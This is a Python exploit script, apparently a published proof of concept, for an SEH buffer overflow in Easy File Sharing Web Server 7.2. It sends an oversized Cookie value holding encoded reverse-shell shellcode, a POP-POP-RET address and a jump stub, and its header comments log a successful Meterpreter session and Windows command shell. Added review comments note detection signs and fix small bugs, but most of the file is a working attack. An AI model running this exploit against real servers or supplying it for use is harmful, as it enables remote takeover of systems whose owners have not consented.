`#!/usr/bin/python
#Easy File Sharing Web Server 7.2 - SEH Exploit - Tested successfully on Windows 10 x64
#GET 'passWD' Buffer Overflow(SEH)
#pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
#Author: N_A , N_A[at]tutanota.com
#OS Name: Microsoft Windows 10 Home
#OS Version: 10.0.14393 N/A Build 14393
#System Type: x64-based PC
#Vendor: http://www.sharing-file.com
#Greets: clubjk, wetw0rk - dude whut up? Sorry man i need to get down and code some BHP with you like our agreement. Raw sockets() for me :)
#Set me a task you want me to complete bro :)) Speak soon man!
#Note on exploitation: Very strange, sometimes works on the second attempt.
#root@kali:~/exploits# python naefsw.py 192.168.142.1 80
#[*]Connection to: 192.168.142.1 successful!
#[*]Evil buffer sent. G0t sh3ll?
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#payload => windows/meterpreter/reverse_tcp
#msf exploit(handler) > set lhost 192.168.142.128
#lhost => 192.168.142.128
#msf exploit(handler) > set lport 443
#lport => 443
#msf exploit(handler) > exploit
#[*] Started reverse TCP handler on 192.168.142.128:443
#[*] Starting the payload handler...
#[*] Sending stage (957999 bytes) to 192.168.142.1
#[*] Meterpreter session 1 opened (192.168.142.128:443 -> 192.168.142.1:57087) at 2017-07-15 07:27:54 +0100
#meterpreter > shell
#Process 9772 created.
#Channel 1 created.
#Microsoft Windows [Version 10.0.14393]
#(c) 2016 Microsoft Corporation. All rights reserved.
#
#C:\Users\NA\Desktop>
import socket, sys
def usage():
    """Print the banner and the expected command-line arguments to stdout.

    The example invocation line interpolates ``sys.argv[0]``. Returns None.
    """
    rule = "===============================================================================\n"
    banner = (
        rule,
        "\t[*]Easy File Sharing Web Server 7.2 - SEH Exploit[*]\n",
        "\t[*]Spawns a reverse meterpreter shell :>[*]\n",
        "\t[*]By N_A[*]\n",
        "\t[*]Usage: [host] [port][*]\n",
        "\t[*]" + sys.argv[0] + " 192.168.142.128 80[*]\n",
        rule,
    )
    # Each entry already ends in "\n", so print() leaves a blank line after it,
    # exactly as the original one-print-per-line version did.
    for line in banner:
        print(line)
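# Both positional arguments are required: argv[1] is the host, argv[2] the port.
# The original guard (< 2) let a host-only invocation fall through to
# sys.argv[2] and die with an IndexError instead of showing the usage text.
if len(sys.argv) < 3:
    usage()
    sys.exit()
vuln = sys.argv[1]  # remote host; also placed verbatim in the Host header
port = sys.argv[2]  # remote port, still a string here; int() is applied at connect time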
# Payload bytes, kept exactly as published. Per the generator command on the
# next line this is a staged windows/meterpreter/reverse_tcp payload built to
# contain no NUL bytes; LHOST/LPORT are the author's lab values. The bytes are
# opaque here -- nothing in this file decodes or inspects them.
# NOTE(review): for defenders the observable effect is an outbound TCP
# connection from the web-server process to the listener (port 443 in the
# header transcript) -- presumably unusual for this service; confirm against
# its normal egress before alerting on it.
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c -b "\x00"
buf = ("\xdb\xc2\xb8\x2d\xb8\x07\x99\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x39\x5a\xf2\x65\xa9\x18"
"\xfd\x95\x29\x7d\x77\x70\x18\xbd\xe3\xf0\x0a\x0d\x67\x54\xa6"
"\xe6\x25\x4d\x3d\x8a\xe1\x62\xf6\x21\xd4\x4d\x07\x19\x24\xcf"
"\x8b\x60\x79\x2f\xb2\xaa\x8c\x2e\xf3\xd7\x7d\x62\xac\x9c\xd0"
"\x93\xd9\xe9\xe8\x18\x91\xfc\x68\xfc\x61\xfe\x59\x53\xfa\x59"
"\x7a\x55\x2f\xd2\x33\x4d\x2c\xdf\x8a\xe6\x86\xab\x0c\x2f\xd7"
"\x54\xa2\x0e\xd8\xa6\xba\x57\xde\x58\xc9\xa1\x1d\xe4\xca\x75"
"\x5c\x32\x5e\x6e\xc6\xb1\xf8\x4a\xf7\x16\x9e\x19\xfb\xd3\xd4"
"\x46\x1f\xe5\x39\xfd\x1b\x6e\xbc\xd2\xaa\x34\x9b\xf6\xf7\xef"
"\x82\xaf\x5d\x41\xba\xb0\x3e\x3e\x1e\xba\xd2\x2b\x13\xe1\xba"
"\x98\x1e\x1a\x3a\xb7\x29\x69\x08\x18\x82\xe5\x20\xd1\x0c\xf1"
"\x47\xc8\xe9\x6d\xb6\xf3\x09\xa7\x7c\xa7\x59\xdf\x55\xc8\x31"
"\x1f\x5a\x1d\xaf\x1a\xcc\x5e\x98\xab\x8c\x37\xdb\xb3\x8d\x7c"
"\x52\x55\xdd\xd2\x35\xca\x9d\x82\xf5\xba\x75\xc9\xf9\xe5\x65"
"\xf2\xd3\x8d\x0f\x1d\x8a\xe6\xa7\x84\x97\x7d\x56\x48\x02\xf8"
"\x58\xc2\xa7\xfc\x16\x23\xcd\xee\x4e\x52\x2d\xef\x8e\xff\x2d"
"\x85\x8a\xa9\x7a\x31\x90\x8c\x4d\x9e\x6b\xfb\xcd\xd9\x93\x7a"
"\xe4\x92\xa5\xe8\x48\xcd\xc9\xfc\x48\x0d\x9f\x96\x48\x65\x47"
"\xc3\x1a\x90\x88\xde\x0e\x09\x1c\xe1\x66\xfd\xb7\x89\x84\xd8"
"\xff\x15\x76\x0f\x7c\x51\x88\xcd\xa0\xfa\xe1\x2d\xe4\xfa\xf1"
"\x47\xe4\xaa\x99\x9c\xcb\x45\x6a\x5c\xc6\x0d\xe2\xd7\x86\xfc"
"\x93\xe8\x83\xa1\x0d\xe8\x27\x7a\x5b\x67\xc8\x7d\x64\x89\xf5"
"\xab\x5d\xff\x3e\x68\xda\xf0\x75\xcd\x4b\x9b\x75\x41\x8b\x8e")
# Layout of the oversized cookie value, in send order: 57 filler bytes, the two
# 4-byte values below, 10 NOPs, the payload, then 2000 trailing filler bytes.
# NOTE(review): the two names are swapped relative to the usual SEH-record
# terminology -- `seh` holds the short-jump bytes and `nseh` holds the
# little-endian address 0x100195f2 that the comment attributes to ImageLoad.dll.
# Only the concatenation order on the `evilbuffer` line matters to the script.
seh = "\xeb\x0a\x90\x90" #jump code right here
nseh = "\xF2\x95\x01\x10" #pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
nops = "\x90"
evilbuffer = "A" * 57 + seh + nseh + nops * 10 + buf + "C" * 2000
# The request is a GET for /vfolder.ghp whose Cookie header carries the buffer
# in the `UserID=PassWD=` field. Detection view: a Cookie header well over
# 2000 bytes long with non-printable bytes in that field is the network-visible
# signature of this request, so a length/charset limit on cookies at a proxy or
# WAF would reject it before it reaches the server.
# NOTE(review): the hard-coded address presumably depends on that module
# loading at a fixed base without SafeSEH/ASLR -- confirm the module's build
# flags. The page names no fixed version and no CVE id.
evil = "GET /vfolder.ghp HTTP/1.1\r\n"
evil += "Host: " + vuln + "\r\n"
evil += "Cookie: SESSIONID=9999; UserID=PassWD=" + evilbuffer + "; frmUserName=; frmUserPass=;\r\n"
evil += "Connection: keep-alive" + "\r\n"
evil += "\r\n\r\n"
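# Open one TCP connection, write the crafted request once, and close.
# Python 2 script: `evil` is a byte-valued str and is sent unmodified. The
# single-argument print(...) form matches usage() and prints the same text.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # int(port) raises ValueError for a non-numeric argument and connect()
    # raises socket.error. The original bare `except:` also swallowed
    # KeyboardInterrupt and SystemExit; those now propagate.
    s.connect((vuln, int(port)))
    print("\n[*]Connection to: " + vuln + " successful!")
except (socket.error, ValueError):
    print("[*]Connection Error.Exiting..")
    s.close()  # release the descriptor on the failure path too
    # Exit non-zero so a wrapper can tell a failed connection from a completed run.
    sys.exit(1)
print("[*]Evil buffer sent. G0t sh3ll?\n")
s.send(evil)
s.close()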
`